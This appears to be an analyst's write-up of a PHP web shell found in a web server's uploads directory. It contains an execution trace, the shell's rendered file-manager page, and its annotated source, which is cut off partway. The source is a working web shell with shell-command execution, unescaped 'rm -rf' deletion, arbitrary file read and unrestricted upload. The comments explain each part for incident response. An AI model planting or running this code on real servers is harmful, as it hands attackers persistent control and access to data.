4	33	0	0.001823	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f KB'	4
4	33	1	0.001838	480416
4	33	R			'4.00 KB'
3	27	1	0.001851	480320
3	27	R			'4.00 KB'
2	25	1	0.001864	480320
2	25	R			'4.00 KB'
2	34	0	0.001879	479992	getowner	1		/var/www/html/uploads/1.php	237	1	'/var/www/html/uploads/'
3	35	0	0.001892	479992	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	35	1	0.001905	480032
3	35	R			TRUE
3	36	0	0.001918	479992	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/'
3	36	1	0.001932	480024
3	36	R			0
3	37	0	0.001944	479984	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	37	1	0.001972	480784
3	37	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	34	1	0.002024	480016
2	34	R			'root'
2	38	0	0.002038	479984	getgroup	1		/var/www/html/uploads/1.php	237	1	'/var/www/html/uploads/'
3	39	0	0.002050	479984	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	39	1	0.002063	480024
3	39	R			TRUE
3	40	0	0.002075	479984	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/'
3	40	1	0.002087	480024
3	40	R			0
3	41	0	0.002099	479984	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	41	1	0.002123	480640
3	41	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	38	1	0.002167	480016
2	38	R			'root'
2	42	0	0.002181	479992	getperms	1		/var/www/html/uploads/1.php	238	1	'/var/www/html/uploads/data'
3	43	0	0.002193	479992	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/data'
3	43	1	0.002207	480040
3	43	R			16895
2		A						/var/www/html/uploads/1.php	70	$s_m = 16895
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	76	$s_p = 'd'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	84	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	87	$s_p .= 'x'
2	42	1	0.002335	480040
2	42	R			'drwxrwxrwx'
2	44	0	0.002350	480008	is_dir	0		/var/www/html/uploads/1.php	233	1	'/var/www/html/uploads/prepend.php'
2	44	1	0.002365	480056
2	44	R			FALSE
2	45	0	0.002379	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/.'
2	45	1	0.002393	480024
2	45	R			FALSE
2	46	0	0.002406	479992	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/..'
2	46	1	0.002420	480040
2	46	R			FALSE
2	47	0	0.002433	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/.htaccess'
2	47	1	0.002447	480040
2	47	R			TRUE
2	48	0	0.002462	480000	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/.htaccess'
3	49	0	0.002474	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/.htaccess'
3	49	1	0.002487	480040
3	49	R			64
2		A						/var/www/html/uploads/1.php	118	$s_s = 64
3	50	0	0.002510	480000	ts	1		/var/www/html/uploads/1.php	121	1	64
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	51	0	0.002537	480000	log	0		/var/www/html/uploads/1.php	114	1	64
4	51	1	0.002549	480032
4	51	R			4.1588830833597
4	52	0	0.002562	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	52	1	0.002573	480032
4	52	R			6.9314718055995
4	53	0	0.002587	480000	floor	0		/var/www/html/uploads/1.php	114	1	0.6
4	53	1	0.002598	480032
4	53	R			0
3		A						/var/www/html/uploads/1.php	114	$s_e = 0
4	54	0	0.002620	480032	floor	0		/var/www/html/uploads/1.php	115	1	0
4	54	1	0.002631	480064
4	54	R			0
4	55	0	0.002643	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	0
4	55	1	0.002655	480104
4	55	R			1
4	56	0	0.002667	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f B'	64
4	56	1	0.002681	480416
4	56	R			'64.00 B'
3	50	1	0.002694	480320
3	50	R			'64.00 B'
2	48	1	0.002707	480320
2	48	R			'64.00 B'
2	57	0	0.002721	480000	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/.htaccess'
3	58	0	0.002733	480000	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	58	1	0.002746	480040
3	58	R			TRUE
3	59	0	0.002759	480000	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/.htaccess'
3	59	1	0.002772	480040
3	59	R			0
3	60	0	0.002784	480000	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	60	1	0.002807	480800
3	60	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	57	1	0.002858	480032
2	57	R			'root'
2	61	0	0.002872	480000	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/.htaccess'
3	62	0	0.002885	480000	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	62	1	0.002897	480040
3	62	R			TRUE
3	63	0	0.002910	480000	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/.htaccess'
3	63	1	0.002923	480040
3	63	R			0
3	64	0	0.002934	480000	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	64	1	0.002956	480656
3	64	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	61	1	0.003000	480032
2	61	R			'root'
2	65	0	0.003018	480000	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/.htaccess'
3	66	0	0.003031	480000	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/.htaccess'
3	66	1	0.003043	480040
3	66	R			33188
2		A						/var/www/html/uploads/1.php	70	$s_m = 33188
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	84	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= '-'
2	65	1	0.003162	480040
2	65	R			'-rw-r--r--'
2	67	0	0.003178	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/1.php'
2	67	1	0.003192	480040
2	67	R			TRUE
2	68	0	0.003207	480000	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/1.php'
3	69	0	0.003218	480000	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/1.php'
3	69	1	0.003230	480040
3	69	R			9731
2		A						/var/www/html/uploads/1.php	118	$s_s = 9731
3	70	0	0.003253	480000	ts	1		/var/www/html/uploads/1.php	121	1	9731
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	71	0	0.003281	480000	log	0		/var/www/html/uploads/1.php	114	1	9731
4	71	1	0.003293	480032
4	71	R			9.183071944822
4	72	0	0.003307	480000	log	0		/var/www/html/uploads/1.php	114	1	1024
4	72	1	0.003318	480032
4	72	R			6.9314718055995
4	73	0	0.003332	480000	floor	0		/var/www/html/uploads/1.php	114	1	1.3248372354921
4	73	1	0.003343	480032
4	73	R			1
3		A						/var/www/html/uploads/1.php	114	$s_e = 1
4	74	0	0.003369	480032	floor	0		/var/www/html/uploads/1.php	115	1	1
4	74	1	0.003381	480064
4	74	R			1
4	75	0	0.003453	480032	pow	0		/var/www/html/uploads/1.php	115	2	1024	1
4	75	1	0.003476	480104
4	75	R			1024
4	76	0	0.003490	480032	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f KB'	9.5029296875
4	76	1	0.003505	480416
4	76	R			'9.50 KB'
3	70	1	0.003519	480320
3	70	R			'9.50 KB'
2	68	1	0.003532	480320
2	68	R			'9.50 KB'
2	77	0	0.003545	480000	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/1.php'
3	78	0	0.003557	480000	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	78	1	0.003571	480040
3	78	R			TRUE
3	79	0	0.003583	480000	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/1.php'
3	79	1	0.003595	480040
3	79	R			1000
3	80	0	0.003607	480000	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	1000
3	80	1	0.003639	480816
3	80	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'osboxes'
2	77	1	0.003694	480032
2	77	R			'osboxes'
2	81	0	0.003708	480000	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/1.php'
3	82	0	0.003719	480000	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	82	1	0.003733	480040
3	82	R			TRUE
3	83	0	0.003745	480000	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/1.php'
3	83	1	0.003757	480040
3	83	R			1000
3	84	0	0.003768	480000	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	1000
3	84	1	0.003800	480656
3	84	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'osboxes'
2	81	1	0.003845	480032
2	81	R			'osboxes'
2	85	0	0.003860	480000	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/1.php'
3	86	0	0.003872	480000	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/1.php'
3	86	1	0.003889	480040
3	86	R			33204
2		A						/var/www/html/uploads/1.php	70	$s_m = 33204
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	84	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= '-'
2	85	1	0.004008	480040
2	85	R			'-rw-rw-r--'
2	87	0	0.004024	480000	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/data'
2	87	1	0.004039	480040
2	87	R			FALSE
2	88	0	0.004052	480008	is_file	0		/var/www/html/uploads/1.php	245	1	'/var/www/html/uploads/prepend.php'
2	88	1	0.004067	480056
2	88	R			TRUE
2	89	0	0.004081	480016	getsize	1		/var/www/html/uploads/1.php	248	1	'/var/www/html/uploads/prepend.php'
3	90	0	0.004094	480016	filesize	0		/var/www/html/uploads/1.php	118	1	'/var/www/html/uploads/prepend.php'
3	90	1	0.004107	480056
3	90	R			57
2		A						/var/www/html/uploads/1.php	118	$s_s = 57
3	91	0	0.004136	480016	ts	1		/var/www/html/uploads/1.php	121	1	57
3		A						/var/www/html/uploads/1.php	113	$s_w = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB', 5 => 'PB', 6 => 'EB', 7 => 'ZB', 8 => 'YB']
4	92	0	0.004164	480016	log	0		/var/www/html/uploads/1.php	114	1	57
4	92	1	0.004175	480048
4	92	R			4.0430512678346
4	93	0	0.004190	480016	log	0		/var/www/html/uploads/1.php	114	1	1024
4	93	1	0.004201	480048
4	93	R			6.9314718055995
4	94	0	0.004215	480016	floor	0		/var/www/html/uploads/1.php	114	1	0.58328900141647
4	94	1	0.004227	480048
4	94	R			0
3		A						/var/www/html/uploads/1.php	114	$s_e = 0
4	95	0	0.004250	480048	floor	0		/var/www/html/uploads/1.php	115	1	0
4	95	1	0.004261	480080
4	95	R			0
4	96	0	0.004273	480048	pow	0		/var/www/html/uploads/1.php	115	2	1024	0
4	96	1	0.004285	480120
4	96	R			1
4	97	0	0.004297	480048	sprintf	0		/var/www/html/uploads/1.php	115	2	'%.2f B'	57
4	97	1	0.004311	480432
4	97	R			'57.00 B'
3	91	1	0.004324	480336
3	91	R			'57.00 B'
2	89	1	0.004337	480336
2	89	R			'57.00 B'
2	98	0	0.004350	480016	getowner	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/prepend.php'
3	99	0	0.004363	480016	function_exists	0		/var/www/html/uploads/1.php	54	1	'posix_getpwuid'
3	99	1	0.004376	480056
3	99	R			TRUE
3	100	0	0.004389	480016	fileowner	0		/var/www/html/uploads/1.php	54	1	'/var/www/html/uploads/prepend.php'
3	100	1	0.004402	480056
3	100	R			0
3	101	0	0.004414	480016	posix_getpwuid	0		/var/www/html/uploads/1.php	54	1	0
3	101	1	0.004436	480816
3	101	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1.php	54	$downer = 'root'
2	98	1	0.004487	480048
2	98	R			'root'
2	102	0	0.004501	480016	getgroup	1		/var/www/html/uploads/1.php	249	1	'/var/www/html/uploads/prepend.php'
3	103	0	0.004513	480016	function_exists	0		/var/www/html/uploads/1.php	55	1	'posix_getgrgid'
3	103	1	0.004526	480056
3	103	R			TRUE
3	104	0	0.004539	480016	filegroup	0		/var/www/html/uploads/1.php	55	1	'/var/www/html/uploads/prepend.php'
3	104	1	0.004552	480056
3	104	R			0
3	105	0	0.004564	480016	posix_getgrgid	0		/var/www/html/uploads/1.php	55	1	0
3	105	1	0.004585	480672
3	105	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1.php	55	$dgrp = 'root'
2	102	1	0.004630	480048
2	102	R			'root'
2	106	0	0.004644	480016	getperms	1		/var/www/html/uploads/1.php	250	1	'/var/www/html/uploads/prepend.php'
3	107	0	0.004656	480016	fileperms	0		/var/www/html/uploads/1.php	70	1	'/var/www/html/uploads/prepend.php'
3	107	1	0.004673	480056
3	107	R			33261
2		A						/var/www/html/uploads/1.php	70	$s_m = 33261
2		A						/var/www/html/uploads/1.php	71	$s_p = 'u'
2		A						/var/www/html/uploads/1.php	74	$s_p = '-'
2		A						/var/www/html/uploads/1.php	79	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	80	$s_p .= 'w'
2		A						/var/www/html/uploads/1.php	81	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	82	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	83	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	84	$s_p .= 'x'
2		A						/var/www/html/uploads/1.php	85	$s_p .= 'r'
2		A						/var/www/html/uploads/1.php	86	$s_p .= '-'
2		A						/var/www/html/uploads/1.php	87	$s_p .= 'x'
2	106	1	0.004794	480056
2	106	R			'-rwxr-xr-x'
1	3	1	0.004811	479952
			0.004848	368512
TRACE END   [2023-02-12 22:41:17.985191]


Generated HTML code

<html><head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
	<title>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</title>



<form method="post" class="in" enctype="multipart/form-data" action="?d=/var/www/html&amp;a=upload"> Upload file :<input type="file" name="filup[]" multiple="" style="border: 0"><input type="submit" name="upload" value=">>"></form><form method="post" action="?d=/var/www/html&amp;a=cmd" class="in"> Command : <input type="text" name="cmd"></form>
<form method="post" action="?d=/var/www/html&amp;a=up">
</form>
<a href="?d=/var/www/html&amp;a=up">Upload</a>

<hr>
Current Dir=|&gt; <a href="?d=/">/</a><a href="?d=/var">var</a>/<a href="?d=/var/www">www</a>/<a href="?d=/var/www/html">html</a>/<table align="center" class="table">
	<tbody><tr><th>Files</th><th>Size</th><th>owner:group</th><th>Permission</th><th>Action</th>
</tr><tr><td><a href="?d=/var/www">Current dir</a></td><td>--</td><td>--</td><td>--</td><td align="right"><a href="?d=/var/www/html&amp;a=touch">Newfile</a> | <a href="?d=/var/www/html&amp;a=mkdir">newdir</a></td></tr>	<tr><td><a href="?d=/var/www/html&amp;a=view&amp;f=1.php">1.php</a></td>
	<td>9.50 KB</td>
	<td>osboxes:osboxes</td>
	<td>-rw-rw-r--</td>
	<td align="right">
	<a href="?d=/var/www/html&amp;a=rename&amp;f=1.php">Rename</a> |
	<a href="?d=/var/www/html/1.php&amp;a=delete">delete</a> |
	<a href="?d=/var/www/html&amp;a=edit&amp;f=1.php">edit</a> |
	<a href="?d=/var/www/html&amp;a=download&amp;f=1.php">download</a></td>
	</tr>
		<tr><td><a href="?d=/var/www/html&amp;a=view&amp;f=beneri.se_malware_analysis">beneri.se_malware_analysis</a></td>
	<td>0</td>
	<td>root:root</td>
	<td>-rw-r--r--</td>
	<td align="right">
	<a href="?d=/var/www/html&amp;a=rename&amp;f=beneri.se_malware_analysis">Rename</a> |
	<a href="?d=/var/www/html/beneri.se_malware_analysis&amp;a=delete">delete</a> |
	<a href="?d=/var/www/html&amp;a=edit&amp;f=beneri.se_malware_analysis">edit</a> |
	<a href="?d=/var/www/html&amp;a=download&amp;f=beneri.se_malware_analysis">download</a></td>
	</tr>
	</tbody></table>
</body></html>

Original PHP code

<!DOCTYPE HTML>
<html>
<head>
<link href="" rel="stylesheet" type="text/css">
<style>
body{
font-family:Times New Roman;
background-color: black;
color:white;
}
#content tr:hover{
background-color: blue;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: blue;
}
table{
border: 1px #000000 dotted;
}
a{
color:white;
text-decoration: none;
}
a:hover{
color:blue;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<?php
// Analyst note: the three calls below only prepare the environment; none of them is shell functionality.
// error_reporting(0) silences every PHP warning and notice, so failed operations leave nothing in the rendered page.
error_reporting(0);
// Removes the script execution time limit.
set_time_limit(0);
// Asks the browser to turn off its legacy reflected-XSS filter.
// HTML has already been emitted above this PHP block, so unless output buffering is active
// this header() call fails ("headers already sent") - silently, because of error_reporting(0).
header("X-XSS-Protection: 0");
/**
 * Return the directory the shell operates on.
 *
 * Uses the `d` query parameter when present, otherwise the PHP working directory.
 * The value is returned as received: no normalisation, no confinement to the web root.
 * Every listing, link and form action built from it therefore works on a caller-chosen path.
 *
 * @return string|false request-supplied path, or getcwd() result
 */
function getpath()
{
	if(isset($_GET['d']))
	{
		// Request-controlled value, used verbatim.
		$d=$_GET['d'];
	}else{
		$d=getcwd();
	}
	return $d;
}
/**
 * Run a shell command and return its output.
 *
 * Probes, in order, system(), exec(), passthru() and shell_exec() with function_exists() and uses the
 * first one available; system() and passthru() output is captured through an output buffer.
 * function_exists() reports false for functions listed in disable_functions, so the chain effectively
 * looks for whichever execution primitive the host left enabled. Returns nothing when all four are missing.
 *
 * Analyst note: no caller is visible in this listing. The page renders a form that posts to `a=cmd`,
 * but the action dispatcher at the end of the file has no `cmd` branch, so this variant looks like a
 * trimmed copy of a larger shell. Hardening that blunts this function: disable_functions for the four
 * primitives above, and a web server configuration that never executes PHP from upload directories.
 *
 * @param string $cmd command line, passed to the shell unmodified
 * @return string|null|false captured output
 */
function cmd($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff; 	} elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; 	} elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; 	} elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; }}
/**
 * Delete a file or directory.
 *
 * Directory: tries rmdir(); if that fails it walks scandir() output, unlinking files and, for every
 * entry that is itself a directory, calling rmdir() and then system('rm -rf ' . $dir).
 * scandir() normally returns "." and "..", which are directories, so a non-empty directory
 * presumably always reaches the `rm -rf` call.
 * File: unlink(), with the same `rm -rf` fallback when unlink() fails.
 *
 * Analyst note: $dir is concatenated into the shell command without escapeshellarg(), and the
 * dispatcher passes the `d` query parameter straight in. On hosts where system() is enabled the
 * `delete` action therefore reaches a shell even though the dedicated command handler is absent;
 * treat any hit on this file as full command execution when scoping an incident.
 * $rm is never initialised, so the return value is undefined when the first rmdir() succeeds
 * or the path does not exist.
 *
 * @param string $dir path to remove (request-controlled at the only visible call site)
 * @return mixed result of the last removal attempt
 */
function delete($dir){if(is_dir($dir)){if(!rmdir($dir)){$s=scandir($dir);foreach ($s as $ss) {if(is_file($dir."/".$ss)){if(unlink($dir."/".$ss)){$rm=rmdir($dir);}}if(is_dir($dir."/".$ss)){$rm=rmdir($dir."/".$ss);$rm.=rmdir($dir);$rm.=system('rm -rf '.$dir);}}}}elseif(is_file($dir)){$rm = unlink($dir);if(!$rm){system('rm -rf '.$dir);}}return $rm;}
/**
 * Resolve the owner of a path for the file listing.
 *
 * Returns the account name when the POSIX extension is available, otherwise the numeric uid
 * reported by fileowner().
 *
 * @param string $path file or directory to inspect
 * @return mixed account name, or numeric uid when posix_getpwuid() is unavailable
 */
function getowner($path)
{
	if (!function_exists('posix_getpwuid')) {
		return fileowner($path);
	}
	// Lookup errors are suppressed, as in the rest of the sample.
	$entry = @posix_getpwuid(fileowner($path));
	return $entry['name'];
}
/**
 * Resolve the group of a path for the file listing.
 *
 * Returns the group name when the POSIX extension is available, otherwise the numeric gid
 * reported by filegroup().
 *
 * @param string $path file or directory to inspect
 * @return mixed group name, or numeric gid when posix_getgrgid() is unavailable
 */
function getgroup($path)
{
	if (!function_exists('posix_getgrgid')) {
		return filegroup($path);
	}
	// Lookup errors are suppressed, as in the rest of the sample.
	$entry = @posix_getgrgid(filegroup($path));
	return $entry['name'];
}
// upload($a, $b): stores one uploaded file at destination $b, preferring move_uploaded_file() and
// falling back to copy(). Returns the boolean result of whichever call ran. There is no check on
// extension, content type or destination, so the caller decides both the file name and where it lands.
// array_upload($file): regroups a multi-file $_FILES entry (one array per field: name, tmp_name, ...)
// into one associative array per uploaded file, indexed 0..n-1.
// Analyst note: this is the persistence path of the sample - anything written through it into a
// directory that executes PHP becomes a further foothold. Files created around the time this script
// was requested are worth collecting during response.
function upload($a,$b){ if(function_exists('move_uploaded_file')){$upl = move_uploaded_file($a,$b);}elseif (function_exists('copy')) {  $upl = copy($a,$b);}return $upl; }function array_upload($file){ $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary;}
/**
 * List a directory for the file browser.
 *
 * When scandir() exists, returns its result and also changes the process working directory to $dir.
 *
 * @param string $dir directory to list (request-controlled via getpath())
 * @return array|string|false scandir() result, or the system() return value in the fallback branch
 */
function sedirs($dir)
{
	if(function_exists('scandir'))
	{
		$s=scandir($dir);
		chdir($dir);
	}else{
		// NOTE(review): this fallback hands the directory path itself to system() as a command line.
		// system() returns only the last output line as a string, which the listing loops cannot
		// iterate, so the branch looks broken rather than intentional. It is still a shell call on
		// a request-controlled value.
		$s=system($dir);
	}
	return $s;
}
/**
 * Render the mode of a path as an ls-style string such as "-rwxr-xr-x".
 *
 * The first character is the file type (s, l, -, b, d, c, p, or u when none of the type masks
 * match); the remaining nine are the owner/group/other read, write and execute bits.
 *
 * @param string $files path to inspect
 * @return string ten-character mode string, or "???????????" when fileperms() yields nothing
 */
function getperms($files)
{
	$mode = @fileperms($files);
	if (!$mode) {
		return "???????????";
	}

	// Type masks are tested in this order and the first match wins, because the masks overlap.
	$typeMasks = array(
		0xC000 => 's',
		0xA000 => 'l',
		0x8000 => '-',
		0x6000 => 'b',
		0x4000 => 'd',
		0x2000 => 'c',
		0x1000 => 'p',
	);
	$rendered = 'u';
	foreach ($typeMasks as $mask => $symbol) {
		if (($mode & $mask) == $mask) {
			$rendered = $symbol;
			break;
		}
	}

	// Walk the nine permission bits from owner-read (0400) down to other-execute (0001).
	$letters = 'rwxrwxrwx';
	for ($pos = 0; $pos < 9; $pos++) {
		$bit = 0400 >> $pos;
		$rendered .= ($mode & $bit) ? $letters[$pos] : '-';
	}
	return $rendered;
}
/**
 * Stream a file to the client as an attachment and terminate the script.
 *
 * Analyst note: the dispatcher builds $file from the `d` and `f` query parameters with no
 * restriction, so this is an arbitrary file read for anything the PHP process can open
 * (configuration files, credentials, source code). Only the download file name is reduced with
 * basename(); the path that is read is not.
 * The header() calls only take effect when output buffering is active, because the page has
 * already emitted HTML by the time this runs; @ob_clean() discards that buffered HTML if so.
 *
 * @param string $file path to send
 * @return void (never returns; calls exit)
 */
function downloads($file)
{
	@ob_clean();
	header('Content-Description: File Transfer');
	header('Content-Type: application/octet-stream');
	header('Content-Disposition: attachment; filename="'.basename($file).'"');
	header('Expires: 0');header('Cache-Control: must-revalidate');
	header('Pragma: public');
	header('Content-Length: ' . filesize($file));
	readfile($file);
	exit;
}
/**
 * Print the contents of a file inside a read-only textarea.
 *
 * The file body is HTML-escaped, the file name in the heading is not.
 * Like downloads(), the path comes from the `d` and `f` query parameters without restriction,
 * so this is a second arbitrary-file-read primitive.
 *
 * @param string $file path to display
 * @return void
 */
function viewfilefunc($file)
{
	echo "<center><h1> View : ".basename($file)."</h1>";
	echo "<textarea readonly cols='100' rows='40'>";
	echo htmlspecialchars(file_get_contents($file));
	echo "</textarea></center>";
}
/**
 * Format a byte count as a human-readable size ("9.50 KB").
 *
 * @param int|float $s_s size in bytes
 * @return string|int formatted size with two decimals and a unit, or 0 for non-positive input
 */
function ts($s_s)
{
	if ($s_s <= 0) {
		return 0;
	}
	$units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
	// Power of 1024 that the size falls into; also the index of the unit label.
	$power = floor(log($s_s) / log(1024));
	$scaled = $s_s / pow(1024, floor($power));
	return sprintf('%.2f ' . $units[$power], $scaled);
}
/**
 * Return the display size of a path for the file listing.
 *
 * @param string $s_f path to measure
